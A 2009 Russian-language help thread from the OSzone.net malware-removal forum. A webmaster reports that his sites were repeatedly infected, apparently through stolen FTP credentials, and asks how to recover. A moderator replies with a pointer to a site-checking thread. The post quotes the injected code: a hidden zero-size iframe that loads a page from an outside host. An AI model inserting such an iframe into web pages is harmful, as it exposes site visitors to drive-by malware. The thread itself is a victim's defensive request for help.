Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » Не могу вылечиться от HTML:Illiframe-D [Trj и что теперь делать?

Ответить
Настройки темы
Не могу вылечиться от HTML:Illiframe-D [Trj и что теперь делать?

Новый участник


Сообщения: 1
Благодарности: 0

Профиль | Отправить PM | Цитировать


Ситуация следующая: несколько дней назад вирусом были заражены все мои сайты (на нескольких хостингах). Код вируса записывался к конец файлов (в основном только файлов с названием index.*). Выглядел примерно следующим образом:

<iframe frameborder="0" onload="if (!this.src){ this.src='http://iq-mozgi.ru:8080/index.php'; this.height='0'; this.width='0';}" >vomfhwifyuxyvbppdqqmcsxjdloumov</iframe>

Аваст определяет HTML:Illiframe-D [Trj]. Сначала я почистил все файлы с такой строкой (и пододными строками, их было несколько вариантов) и все вроде как наладилось. На следующий день у меня снова все сайты были заражены. Тут я понял, что зря я хранил пароли введенными в total commander. Чтобы избавиться от вируса, я сначала поменял все пароли, удалил фтп соединения из тотала, снова почистил хост. Все опять наладилось, но уже на следующий день снова все сайты заражены. В чем же дело - я же уже не сохранял пароли? А может вирус прописался в пределах сайта, чтобы самовосстанавливаться?

ЧТо касается безопасности, то перед первым заражением у меня стояла бесплатная версия Avira (которая регулярно обновляется), затем в дополнение к Avira я поставил Avast, проверил им комп, он вроде как убил вирусы, но как видимо - не все. Система WinXP SP3 (обновления отключены)

Еще один момент - когда запускаю вебмани (и еще в некоторых случаях) сейчас (после установки аваста), Avira ругается на обнаружение вируса TR/Crypt.XPACK.Gen, но показывает, что он находится в файле C:\WINDOWS\Temp\_avast4_\unp174722536.tmp.

Итак, на данный момент я принял решение, что нужно переставить винду (перед этим отформатировав все диски), затем поставить нормальный антивирус и файервол и в дальнейшем не сохранять фтп пароли введенными. Что касается сайтов - то посносить их и восстановить записи из БД (у меня все в основном на вордпрессе).

От вас жду:
1. Советов по поводу правильности моего решения (и эффективности на будущее)
2. Советов, какие антивирь и файервол лучше установить, и вообще как граммотно восстановить безопасность в данном случае?

p.s. и еще меня очень настораживает момент, что после смены паролей (при том что они не сохранялись в фтп клиенте) - вирус их все-таки украл (конечно, если на сайтах просто не остался самовосстанавливающийся вирусный код)

Отправлено: 11:47, 04-11-2009

 

Аватара для Drongo

Будем жить, Маэстро...


Сообщения: 6694
Благодарности: 1393

Профиль | Сайт | Отправить PM | Цитировать


loftiplamar, Попробуйте с проверкой сайта на вирусы обратиться сюда - Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте тут

-------
Правильная постановка вопроса свидетельствует о некотором знакомстве с делом.
3нание бывает двух видов. Мы сами знаем предмет — или же знаем, где найти о нём сведения.
[Quick Killer 3.0 Final [OSZone.net]] | [Quick Killer 3.0 Final [SafeZone.cc]] | [Парсер логов Gmer] | [Парсер логов AVZ]

http://tools.oszone.net/Drongo/Userbar/SafeZone_cc.gif


Отправлено: 16:00, 04-11-2009 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.



Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » Не могу вылечиться от HTML:Illiframe-D [Trj и что теперь делать?

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
Прочее - С Ubuntu - на Windows. В интернет теперь выйти не могу! Valery- Общий по Linux 2 18-06-2009 18:12
Да,лопухнулся...а че теперь делать? Kranmaster Ноутбуки 26 21-11-2007 09:11
[решено] Не возможно вылечиться от вируса Banker-CUU[Trj] SimSim Лечение систем от вредоносных программ 8 21-11-2007 01:06
Не могу скачать файл с ftp. Что делать? AlexanderS2004 Хочу все знать 3 23-08-2004 15:17




 
Переход